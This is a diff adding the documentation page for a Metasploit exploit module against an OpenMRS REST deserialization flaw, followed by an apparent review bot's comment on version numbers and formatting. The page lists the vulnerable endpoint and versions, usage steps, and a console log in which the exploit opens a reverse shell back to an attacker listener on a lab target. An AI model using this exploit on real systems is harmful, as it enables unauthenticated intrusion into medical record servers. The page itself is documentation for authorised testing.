diff --git a/documentation/modules/exploit/multi/http/openmrs_deserialization.md b/documentation/modules/exploit/multi/http/openmrs_deserialization.md new file mode 100644 index 0000000000..0af4e532f3 --- /dev/null +++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md 
@@ -0,0 +1,69 @@ +## Vulnerable Application + + OpenMRS is an open-source platform that supplies + users with a customizable medical record system. + + There exists an object deserialization vulnerability + in the `webservices.rest` module used in OpenMRS Platform + for versions below `v2.24.0`. Unauthenticated remote code + execution can be achieved by sending a malicious XML payload + to a Rest API endpoint such as `/ws/rest/v1/concept`. + + Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/). + + Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java + 8 and Java 9. + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/multi/http/openmrs_deserialization``` + 4. Do: ```set TARGETURI ``` + 5. Do: ```set RHOSTS ``` + 6. Do: ```run``` + 7. You should get a shell. + +## Options + + **ForceExploit** + + Overrides the check result and runs the exploit. + +## Scenarios + +### Version of software and OS as applicable + + ``` + msf5 > use exploit/multi/http/openmrs_deserialization + msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168 + rhosts => 192.168.37.168 + msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone + targeturi => /openmrs-standalone + msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1 + lhost => 192.168.37.1 + msf5 exploit(multi/http/openmrs_deserialization) > check + [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2 + msf5 exploit(multi/http/openmrs_deserialization) > run + + [*] Started reverse TCP double handler on 192.168.37.1:4444 + [*] Target is running OpenMRS + [*] Formatting payload + [*] Sending payload... + [*] Accepted the first client connection... + [*] Accepted the second client connection... 
+ [*] Command: echo wKYK4x9ZOHJ37tm7; + [*] Writing to socket A + [*] Writing to socket B + [*] Reading from sockets... + [*] Reading from socket B + [*] B: "wKYK4x9ZOHJ37tm7\r\n" + [*] Matching... + [*] A is input... + [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600 + + whoami + space + id + uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) + ```
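Review bot: The version statements in the "Vulnerable Application" section do not line up and need clarifying: the text says the `webservices.rest` module is vulnerable for versions below `v2.24.0`, while testing is reported on "OpenMRS Platform `v2.1.2` and `v2.21`" and the `check` output in the scenario prints "OpenMRS platform version: 2.1.2". State explicitly whether `v2.24.0` is a module version and `v2.21` a platform version (or whether `v2.21` is a typo), because readers will otherwise compare module and platform numbers against each other. Two smaller points in the same file: the Verification Steps wrap commands in inline triple backticks (```use exploit/multi/http/openmrs_deserialization```), which should be single backticks, and steps 4 and 5 leave the values empty (`set TARGETURI ` and `set RHOSTS `), so give placeholders such as `set TARGETURI /openmrs-standalone` and `set RHOSTS <target address>`; the Scenarios heading "Version of software and OS as applicable" is the documentation template placeholder and should name the setup actually shown in the session (OpenMRS Platform 2.1.2 standalone on port 8081).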